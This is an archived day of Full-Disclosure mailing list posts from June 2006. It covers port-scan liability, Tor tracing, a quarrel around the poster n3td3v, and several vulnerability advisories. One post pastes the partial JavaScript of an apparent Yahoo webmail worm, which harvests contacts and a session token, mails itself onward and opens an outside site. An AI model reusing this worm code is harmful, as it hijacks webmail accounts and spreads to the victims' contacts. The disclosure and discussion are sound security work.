Re: [Full-disclosure] SANS on-duty 'cock handlers'

2006-06-12 Thread Dan B
Hi,

n3td3v wrote:
 n3td3v: Sure my comments on FD on 666 were just hear-say, but theres
 loads of defacers out there. Morning wood is promoting the new
 'zone-h.org http://zone-h.org' website via his Y messenger status
 the last two days, I feel sorry for the zone-h crew right now.
  

Just thought I'd point out that Morning Wood is involved with zone-h.
Why should he not be informing others of the new design of the zone-h
website?
If in fact even he wasn't involved and just liked the design there is
nothing wrong with him promoting it!

Ref:
http://web.archive.org/web/20050205215657/http://www.zone-h.org/en/staff

Cheers,
Dan.


PS. I'm not sure how many people are feeling sorry for you (your crew?
n3td3v crew?) right now!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] terrorists have invaded the united states

2006-06-12 Thread GroundZero Security
or you just put
[EMAIL PROTECTED]ERROR:550 piss off
in /etc/mail/access if you use sendmail

- Original Message - 
From: Byron Sonne [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Sunday, June 11, 2006 6:16 PM
Subject: Re: [Full-disclosure] terrorists have invaded the united states


 Why don't you folks just put up some filters for 'n3td3v'? I did months 
 ago along with everyone else I know and it's been a blessing.
 
 Either fire up firefox and add the filter, or locate your 
 msgFilterRules.dat and add this (change the  to your username, duh):
 
 name=n3td3v crap
 enabled=yes
 type=1
 action=Move to folder
 actionValue=mailbox://[EMAIL PROTECTED]/Trash
 condition=OR (subject,contains,n3td3v) OR (from,contains,n3td3v) OR (to 
 or cc,contains,n3td3v) OR (body,contains,n3td3v)
 
 The condition line should be a single line, but my mailer wraps it.
 
 Problem solved.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] scanning

2006-06-12 Thread schanulleke . 29172787
--- [EMAIL PROTECTED] wrote:
 What's this mean? It means that if you
scan some lame-ass system and it
 crashes as a result, you might be in deep
shit.  And it shouldn't have
 crashed from a portscan does *not* hold
up in court.

Having done pen-testing in the past I have disabled (dos-ed)
systems and entire networks with a portscan.

My employer would never let
me do any work withaout a prior written agreement.

However, law is highly
fluctuate over time and from country to country. Dutch law recently changed.
In the past you had to have broken a security barrier in order to be accused
of hacking, now it has changed to with the intent to  do harm.

Is it
illegal? Not enough data to compute / that is one for the lawers...
Is it
unwise? Probably...
Will you get cought/sued? Unlikely...
Would I bother
to sue you? No...

Schanulleke

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread David Loyall
Hello, all.I just received an email with an html attachment, on a yahoo account.When I opened the mail, yahoo automatically displayed the html, and executed the code within.What the hell. =)It forwarded the message to my contacts list, (or some other set of addresses, dunno,) and redirected my browser to a website.
I'm of to a BBQ, and I don't care about yahoo.So I'm not even going to read the code and see how this happens.I'm attaching the html file as a text file.Enjoy!

Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful.
Cheers,
--David LoyallOmaha, NebraskaDavid Loyall
img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' 
target=onload=var http_request = false;var Email = '';   var IDList = 
'';   var CRumb = '';   function makeRequest(url, Func, Method, Param) {
if (window.XMLHttpRequest) {http_request = new XMLHttpRequest();
} else if (window.ActiveXObject) {http_request = new 
ActiveXObject('Microsoft.XMLHTTP');}
http_request.target=onreadystatechange = Func;   
http_request.open(Method, url, true);if( Method == 'GET')   
http_request.send(null);elsehttp_request.send(Param);
}window.open('http://www,lastdata.com'); ServerUrl =  url0;USIndex = 
ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen = 
MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen);
function GetIDs(HtmlContent)   { IDList = '';
StartString = ' td';  EndString = '/td';
i = 0;  StartIndex = 
HtmlContent.indexOf(StartString, 0);   while(StartIndex = 0)   
   {   EndIndex = HtmlContent.indexOf(EndString, 
StartIndex);  CutLen = EndIndex - StartIndex - 
StartString.length;YahooID = HtmlContent.substr(StartIndex 
+ StartString.length, CutLen);  
if( YahooID.indexOf('@yahoo.com', 0)  0 || YahooID.indexOf('@yahoogroups.com', 
0)  0 )IDList = IDList + ',' + YahooID ;   
StartString = '/tr';  StartIndex = 
HtmlContent.indexOf(StartString, StartIndex + 20); StartString 
= ' td';  StartIndex = 
HtmlContent.indexOf(StartString, StartIndex + 20); i++; 
   }   if(IDList.substr(0,1) == ',')
   IDList = IDList.substr(1, IDList.length);   
if(IDList.indexOf(',', 0)0 )   {   
IDListArray = IDList.split(',');Email = IDListArray[0]; 
IDList = IDList.replace(Email + ',', '');   
} CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', ''); 
IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail, 
'');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' + 
UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList = 
IDList.replace(UserEmail, ''); return IDList;   }   function 
ListContacts()   {   if (http_request.readyState == 4) {if 
(http_request.status == 200) {   HtmlContent =  
http_request.responseText;   IDList = GetIDs(HtmlContent);  
 makeRequest('http://us.' + 
Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', 
null);   }}}   function ExtractStr(HtmlContent)   { 
   StartString = 'name=\u0022.crumb\u0022 value=\u0022';   
EndString = '\u0022';   i = 0;  StartIndex = 
HtmlContent.indexOf(StartString, 0);   EndIndex = 
HtmlContent.indexOf(EndString, StartIndex + StartString.length );
CutLen = EndIndex - StartIndex - StartString.length;crumb = 
HtmlContent.substr(StartIndex + StartString.length , CutLen );  return 
crumb;  }   function Getcrumb()   {  if (http_request.readyState == 
4) {if (http_request.status == 200) {
HtmlContent =  http_request.responseText;   CRumb = 
ExtractStr(HtmlContent); MyBody 
= 'this is test';   MySubj = 'New Graphic Site';
 Url = 'http://us.' + Server + 
'.mail.yahoo.com/ym/Compose';   
 var ComposeAction = compose.action;MidIndex = 
ComposeAction.indexOf('Mid=' ,0);incIndex = ComposeAction.indexOf('inc' 
,0);CutLen = incIndex - MidIndex - 5;var MyMid 

Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread c0ntex

On 12/06/06, David Loyall [EMAIL PROTECTED] wrote:

Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper
write-up, and encourage them to close the hole, that'd be wonderful.


I know this guy who has over 7 years of direct security influence with
Yahoo and Google security engineers!

In 1972, a crack commando unit was sent to social prison by a mailing
list for a claim they couldn't prove. These men promptly escaped from
a maximum security stockade to the Moon. Today, still wanted by nobody
other than their mommy, they survive playing soldiers of fortune. If
you have a problem with Yahoo or any fortune 500 that may be hiring
black hat hackers as part of internal espionage, if no one else can
help, and if you can find them, maybe you can hire...The n3td3v Group

--

regards
c0ntex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] scanning

2006-06-12 Thread GroundZero Security
When you say that by running a portscan you dossed a whole network
then i would say either you are crazy or your portscanner is seriously broken 
lol
I have been doing pen-tests since 1998 and never ever dossed a whole Network
by accident, especially not with a simple portscan. 

-sk
- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Monday, June 12, 2006 11:23 AM
Subject: Re: [Full-disclosure] scanning


 --- [EMAIL PROTECTED] wrote:
  What's this mean? It means that if you
 scan some lame-ass system and it
  crashes as a result, you might be in deep
 shit.  And it shouldn't have
  crashed from a portscan does *not* hold
 up in court.
 
 Having done pen-testing in the past I have disabled (dos-ed)
 systems and entire networks with a portscan.
 
 My employer would never let
 me do any work withaout a prior written agreement.
 
 However, law is highly
 fluctuate over time and from country to country. Dutch law recently changed.
 In the past you had to have broken a security barrier in order to be accused
 of hacking, now it has changed to with the intent to  do harm.
 
 Is it
 illegal? Not enough data to compute / that is one for the lawers...
 Is it
 unwise? Probably...
 Will you get cought/sued? Unlikely...
 Would I bother
 to sue you? No...
 
 Schanulleke
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread nocfed

On 6/12/06, c0ntex [EMAIL PROTECTED] wrote:

On 12/06/06, David Loyall [EMAIL PROTECTED] wrote:
 Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper
 write-up, and encourage them to close the hole, that'd be wonderful.

I know this guy who has over 7 years of direct security influence with
Yahoo and Google security engineers!



You know that you really should have replied from [EMAIL PROTECTED] and
attached a .shm or a .scr, right?  I would definatly open any
attachment sent from [EMAIL PROTECTED] in a heartbeat.

Really though, that's some crappy static code.  It reminds me of a 1st
year programmer that replicates their same call 100 times to get 1
thing done.

I'm not quite sure how people still fall for these things... be it a
executable attachment or html, that low and behold CAN have javascript
(AJAX/Web 2.0TM) in it, you should not be just opening any
attachments.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread Eric Chien
Check out: http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED]...Eric
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] scanning

2006-06-12 Thread schanulleke . 29172787
Believe it or not, it was a Nokia running CheckPoint NG, but not well 
configured.


Because the network was taking a lot of traffic during normal ops so no
problems (yet). However it was taken down by a broadcast storm earlier.


I was running multiple SYN-scan sessions of nmap with agressive timing
(and very low max-rtt and max-timeout and max-delay setting), so not polite
at all.

IF I was doing a pen test AND I wasn't telling anyone I would NOT
be using this settings, but go low and slow. The point that I was making
tough is that pen-tests and port scans can go wrong (and if you have Murphy
as your back-seat driver, they will go wrong).

We have also seen packet
loss when scanning some webservers over a 2 Mbps line. Also because the Nokia
was taking too much CPU cycles for inspections and logging.

Schanulleke


--- GroundZero Security [EMAIL PROTECTED] wrote:
What kind of firewall was
it ? I can't imagine that it isn't able 
 to handle your single connect()
requests, since what happens 
 if a lot of the internal client computers
have external requests?
 
 The network would be constantly lagged and
as you 
 describe it, the firewall would stop responding even without

a scan. I just wonder what vendor the firewall produced.
 
 When you use
a normal port scanner like nmap with a polite 
 timing and ip by ip, i doubt
this would happen. Maybe if you 
 use some scanner that is multithreaded
and scan's a lot of ip's
 a second and do a full connect() (maybe even send
a request)
 on all possible ports on as much hosts as possible, then i could

 imagine your scenario. A normal port scan/subnet scan 
 however, shouldn't
be any problem.
 
 When you do a penetration test you do have 5 minutes
to wait
 and we where talking about a simple port scan. I think at court

 it wouldn't matter as the understanding of the scan would be the
 same
for them. So even if there is a very slim chance that this 
 actually happens
on a network, it would be hard to explain 
 probably. Then again all you
did theoreticaly is looking for 
 open services they offer to the public,
if their server is miss 
 configured, is that your fault ? On the other
side, the network 
 owner would probably respond that you shouldn't snoop

 around on his servers. So this is indeed a problematic situation 
 and
i have to admit you make a point here, although i still don't
 think that
this will happen very offten :-)
 
 - Original Message - 
 From:
[EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Monday,
June 12, 2006 12:13 PM
 Subject: Re: [Full-disclosure] scanning
 
 

  I was on local site with a direct ethernet connection, the client had
all
  internal traffic routed via a firewall, the firewall was configured
with too
  many and too complex rules.
  
  I caused too many sessions,
causing too much
  logs causing the firewall to stop responding in time
and all servers to be
  separated from all clients.
  
  Needless
to say this was a major finding in
  my report.
  
  We have observed
the same behaviour with external facing firewalls.
  
  
  Schanulleke

  
  --- GroundZero Security [EMAIL PROTECTED] wrote:
  When you say
  that by running a portscan you dossed a whole network
   then i
would say
  either you are crazy or your portscanner is seriously broken
lol
   I have
  been doing pen-tests since 1998 and never ever dossed
a whole Network
   by
  accident, especially not with a simple portscan.

   
   -sk
  
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] terrorists have invaded the united states

2006-06-12 Thread b . hines


You are correct, Terrorist have invaded the US...
http://archives.cnn.com/2001/US/09/11/chronology.attack/index.html

and now you see they must be mitigated, with extreme prejudice.






---BeginMessage---
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/---End Message---
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread pdp (architect)

They've got it quite quickly. 10x
Since the source code is open to everyone now, it is just a matter of
time for someone to redesign it and make it work Yahoo Beta as well.

On 6/12/06, Eric Chien [EMAIL PROTECTED] wrote:

Check out:
http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED]

...Eric

___
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
pdp (architect)
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] exif thumbnails in FBI

2006-06-12 Thread Tonu Samuel

Hi all bad guys :P

I can't resist, FBI rocks! 

http://no.spam.ee/~tonu/exif/?srcid=1847src=http://www.fbi.gov/wanted/seekinfo/erienote1.jpg

   Tõnu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] McAfee VirusScan Enterprise 8.0.0 Misidentifies EICAR Test File

2006-06-12 Thread Marcos Agüero
TheGesus escribió:
 And you have an instant Elspy.worm flood and your Enterprise AntiVirus
 Administrator is shitting his pance.  Run in circles, scream and shout
 and all THAT.
Oh! That's really stupid! The logs will show 1 infection on the same
PC within a few seconds. Easy to spot as a false positive and remove
from the report. And such things happens in real world without the help
of lame people like you. Can't see where is the fun on this, except your
stupidity-disclousure.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Is there a way to trace back Tor user

2006-06-12 Thread Jianqiang Xin
Regarding to recent debate about the use of Tor. Just wondering if it
is practical to trace back the user if he is using Tor to hide his
origin. As far as I know, there were several approaches using timing
correlation to trace back TCP connections. It seems that the technique
is there but the problem is the placement of monitors. Since the Tor
servers are scatter around the world and it is impractical to
access them all. If in a perfect world that you can monitor
all the traffic of all Tor servers, you should be able to trace back
with high success rate. 

Is there any better solutions? Thanks.

yours,
Michael

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Secunia Research: MyBB domecode() PHP Code Execution Vulnerability

2006-06-12 Thread Secunia Research
==

 Secunia Research 12/06/2006

 - MyBB domecode() PHP Code Execution Vulnerability -

==
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

==
1) Affected Software

MyBB 1.1.2

Prior versions may also be affected.

==
2) Severity

Rating: Highly critical
Impact: System access
Where:  Remote

==
3) Vendor's Description of Software

MyBB is a powerful, efficient and free forum package developed in PHP 
and MySQL. MyBB has been designed with the end users in mind, you and 
your subscribers. Full control over your discussion system is 
presented right at the tip of your fingers, from multiple styles and 
themes to the ultimate customisation of your forums using the 
template system.

Product link:
http://www.mybboard.com/

==
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in MyBB, which can be 
exploited by malicious people to compromise a vulnerable system.

Input passed to the username field when registering isn't properly 
sanitised before being used in a preg_replace call with the e 
modifier in the domecode() function in inc/functions_post.php. This 
can be exploited to execute arbitrary PHP code by first registering 
with a specially crafted username and then previewing a post 
containing the /slap string.

The vulnerability has been confirmed in version 1.1.2. Prior versions 
may also be affected.

==
5) Solution

Update to version 1.1.3.
http://www.mybboard.com/downloads.php

==
6) Time Table

06/06/2006 - Initial vendor notification.
06/06/2006 - Vendor confirms vulnerability.
12/06/2006 - Public disclosure.

==
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-2908 for the vulnerability.

==
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-40/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Is there a way to trace back Tor user

2006-06-12 Thread CIRT.DK Mailinglists



Hey there

There is a paper out trying to describe the different 
methods of tracking TOR user

http://www.fortconsult.net/images/pdf/tpr_100506.pdf

Best regards
Dennis
CIRT.DK


From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf Of Jianqiang 
XinSent: Monday, June 12, 2006 4:49 PMTo: 
full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] Is there 
a way to trace back Tor user
Regarding to recent debate about the use of Tor. Just wondering if it 
is practical to trace back the user if he is using Tor to hide his origin. As 
far as I know, there were several approaches using timing correlation to trace 
back TCP connections. It seems that the technique is there but the problem is 
the placement of monitors. Since the Tor servers are scatter around the world 
and it is impractical to access them all. If in a perfect world that 
you can monitor all the traffic of all Tor servers, you should be able to trace 
back with high success rate. Is there any better solutions? 
Thanks.yours,Michael
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is there a way to trace back Tor user

2006-06-12 Thread poo
that paper is useless
which isnt surprising when you see who wrote it
On 6/12/06, CIRT.DK Mailinglists [EMAIL PROTECTED] wrote:



Hey there

There is a paper out trying to describe the different methods of tracking TOR user

http://www.fortconsult.net/images/pdf/tpr_100506.pdf


Best regards
Dennis
CIRT.DK


From: [EMAIL PROTECTED] [mailto:
[EMAIL PROTECTED]] On Behalf Of Jianqiang XinSent:
 Monday, June 12, 2006 4:49 PMTo: full-disclosure@lists.grok.org.ukSubject:
 [Full-disclosure] Is there a way to trace back Tor user

Regarding to recent debate about the use of Tor. Just wondering if it is practical to trace back the user if he is using Tor to hide his origin. As far as I know, there were several approaches using timing correlation to trace back TCP connections. It seems that the technique is there but the problem is the placement of monitors. Since the Tor servers are scatter around the world and it is impractical to access them all. If in a perfect world that you can monitor all the traffic of all Tor servers, you should be able to trace back with high success rate. 
Is there any better solutions? Thanks.yours,Michael
___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
-- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] file upload widgets in IE and Firefox have issues

2006-06-12 Thread Charles McAuley
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Danny wrote:
 Hi ,
 
 I read your article , but since I am not at all at home when scripting
 comes up,I still am wondering what this issue is exactly.
 
My web-foo is not that strong either.
Bart van Arnhem made a much better example in IE than I did.
as he says, just simply bang on the keyboard alot.  make sure to press
the : char and the \ char for a full string.  You'll eventually see
c:\boot.ini appear.

 Could you give me an example as to clarify things for a non ? English
 speaking fella?
 

In this wonderful, everything is the web driven world, its entirely
possibly that you might type enough text into a web-application in order
to filter out all the keys necessary to upload an arbitrary file off of
a computer.  For instance, into your web mail, or experts-exchange
forums, or google's new spreadsheet app, or a typing tutor program.

Is this a big a deal?  It depends entirely on your web surfing habits.


 Also ,what is this ?file input box??Are these the boxes in forms where
 one is supposed to fill in the name,address, password, etc?
 

its the input widget...
input type=file name=uploadme 
where you choose a file to upload from YOUR computer to a WEBSERVER.


 Sorry for not understanding it completely , it seems to me you have been
 busy digging out stuff the programmers should have checked in the first
 place.
 

These flaws were reported a year ago, confirmed, and ignored by both
Mozilla and Microsoft.  I marked the bug on mozilla's site with the
security flag, it was their call to remove it.  Also, I wasn't the first
or last person to find this problem _independently_.  This has been
known to the Mozilla group since 2000.  Surely they could have done
something by now?

After a year, I figured I'd just let other people know about, maybe then
it would get fixed.  Do I think this is a huge gaping security hole?
Not right now, but Bart's code definitely shows what can be done if
other people keep banging away.

I'd like to repeat myself on that last point.
Security Impact: Minor

 Nice job there , I just hope I can fully understand it.
 
 Kind regards,
 
 Danny
 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEjbDJyZFfwQJZqy8RAuDlAJ4uWUEEkDuPiNOZr9v2H9M7E63ayQCdEToT
S/Q3tXdbTxqOLdbDUA+IaFA=
=UJw+
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] rPSA-2006-0100-1 freetype

2006-06-12 Thread Justin M. Forbes
rPath Security Advisory: 2006-0100-1
Published: 2006-06-12
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
User Non-deterministic Weakness
Updated Versions:
freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-2.2-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0747
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2661
http://issues.rpath.com/browse/RPL-429

Description:
Previous versions of the freetype library contain multiple integer
overflow weaknesses which allow remote providers of font files
(which may include fonts embedded in documents such as PDF files)
to cause applications to crash, and may possibly also allow them
to execute arbitrary code as the user accessing the files.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-12 Thread n3td3v
Yahoo is under the control of hackers.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDKSA-2006:099 ] - Updated freetype2 packages fixes multiple vulnerabilities.

2006-06-12 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:099
 http://www.mandriva.com/security/
 ___
 
 Package : freetype2
 Date: June 12, 2006
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Integer underflow in Freetype before 2.2 allows remote attackers to cause 
 a denial of service (crash) via a font file with an odd number of blue 
 values, which causes the underflow when decrementing by 2 in a context 
 that assumes an even number of values. (CVE-2006-0747)
 
 Multiple integer overflows in FreeType before 2.2 allow remote attackers to 
 cause a denial of service (crash) and possibly execute arbitrary code via 
 attack vectors related to (1) bdf/bdflib.c, (2) sfnt/ttcmap.c, 
 (3) cff/cffgload.c, and (4) the read_lwfn function and a crafted LWFN file 
 in base/ftmac.c. (CVE-2006-1861)
 
 Ftutil.c in Freetype before 2.2 allows remote attackers to cause a denial 
 of service (crash) via a crafted font file that triggers a null dereference.
 (CVE-2006-2661)
 
 In addition, a patch is applied to 2.1.10 in Mandriva 2006 to fix a serious 
 bug in ttkern.c that caused some programs to go into an infinite loop when 
 dealing with fonts that don't have a properly sorted kerning sub-table. 
 This patch is not applicable to the earlier Mandriva releases.  
 
 Packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2661
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 500d6a0363b912d3708164333618ea9a  
10.2/RPMS/libfreetype6-2.1.9-6.1.102mdkmdk.i586.rpm
 8dc7ea21f0c7485fb2e89722b61662e6  
10.2/RPMS/libfreetype6-devel-2.1.9-6.1.102mdkmdk.i586.rpm
 822d356b7df358d6fd33fdcba1ecce48  
10.2/RPMS/libfreetype6-static-devel-2.1.9-6.1.102mdkmdk.i586.rpm
 01fc46490cdad24a0ac7145ad1400fbe  
10.2/SRPMS/freetype2-2.1.9-6.1.102mdkmdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 8bafa7103832649910ff29e46d3414da  
x86_64/10.2/RPMS/lib64freetype6-2.1.9-6.1.102mdkmdk.x86_64.rpm
 116215379bbfe0cdf14e370fd74c  
x86_64/10.2/RPMS/lib64freetype6-devel-2.1.9-6.1.102mdkmdk.x86_64.rpm
 01ce8b9853b9e509a7d8f034ff21cfb6  
x86_64/10.2/RPMS/lib64freetype6-static-devel-2.1.9-6.1.102mdkmdk.x86_64.rpm
 500d6a0363b912d3708164333618ea9a  
x86_64/10.2/RPMS/libfreetype6-2.1.9-6.1.102mdkmdk.i586.rpm
 8dc7ea21f0c7485fb2e89722b61662e6  
x86_64/10.2/RPMS/libfreetype6-devel-2.1.9-6.1.102mdkmdk.i586.rpm
 822d356b7df358d6fd33fdcba1ecce48  
x86_64/10.2/RPMS/libfreetype6-static-devel-2.1.9-6.1.102mdkmdk.i586.rpm
 01fc46490cdad24a0ac7145ad1400fbe  
x86_64/10.2/SRPMS/freetype2-2.1.9-6.1.102mdkmdk.src.rpm

 Mandriva Linux 2006.0:
 6068722811b9404d5aa08ee477987fb2  
2006.0/RPMS/libfreetype6-2.1.10-9.2.20060mdk.i586.rpm
 817917e69abb5674f646544308536419  
2006.0/RPMS/libfreetype6-devel-2.1.10-9.2.20060mdk.i586.rpm
 dc4748e47335cc44243e39711c04def5  
2006.0/RPMS/libfreetype6-static-devel-2.1.10-9.2.20060mdk.i586.rpm
 6fbbc5e83a43e7c0b4c09593892ca554  
2006.0/SRPMS/freetype2-2.1.10-9.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 985900ddba982582ecb7d7eb51c20200  
x86_64/2006.0/RPMS/lib64freetype6-2.1.10-9.2.20060mdk.x86_64.rpm
 afe093ac0ef65d5f5505f0c907d9c8dc  
x86_64/2006.0/RPMS/lib64freetype6-devel-2.1.10-9.2.20060mdk.x86_64.rpm
 6f924308e4c1fe2da976a8d7905b9c45  
x86_64/2006.0/RPMS/lib64freetype6-static-devel-2.1.10-9.2.20060mdk.x86_64.rpm
 6068722811b9404d5aa08ee477987fb2  
x86_64/2006.0/RPMS/libfreetype6-2.1.10-9.2.20060mdk.i586.rpm
 817917e69abb5674f646544308536419  
x86_64/2006.0/RPMS/libfreetype6-devel-2.1.10-9.2.20060mdk.i586.rpm
 dc4748e47335cc44243e39711c04def5  
x86_64/2006.0/RPMS/libfreetype6-static-devel-2.1.10-9.2.20060mdk.i586.rpm
 6fbbc5e83a43e7c0b4c09593892ca554  
x86_64/2006.0/SRPMS/freetype2-2.1.10-9.2.20060mdk.src.rpm

 Corporate 3.0:
 ffb8fe54281b48ae7c8c0df2cdff4226  
corporate/3.0/RPMS/libfreetype6-2.1.7-4.1.C30mdkmdk.i586.rpm
 8160069b2aedc139d573d06786362b38  
corporate/3.0/RPMS/libfreetype6-devel-2.1.7-4.1.C30mdkmdk.i586.rpm
 3dc8f49900b644bdbed9c1ff87eab2e8  
corporate/3.0/RPMS/libfreetype6-static-devel-2.1.7-4.1.C30mdkmdk.i586.rpm
 f3435422496277db7390cfc62ca58b3a  
corporate/3.0/SRPMS/freetype2-2.1.7-4.1.C30mdkmdk.src.rpm

 Corporate 3.0/X86_64:
 86b12f1232fd54bcd76c59f9598a190d  
x86_64/corporate/3.0/RPMS/lib64freetype6-2.1.7-4.1.C30mdkmdk.x86_64.rpm
 db3ab38c85b3a39b848a499e4f2688c3  
x86_64/corporate/3.0/RPMS/lib64freetype6-devel-2.1.7-4.1.C30mdkmdk.x86_64.rpm
 

[Full-disclosure] [ GLSA 200606-14 ] GDM: Privilege escalation

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200606-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
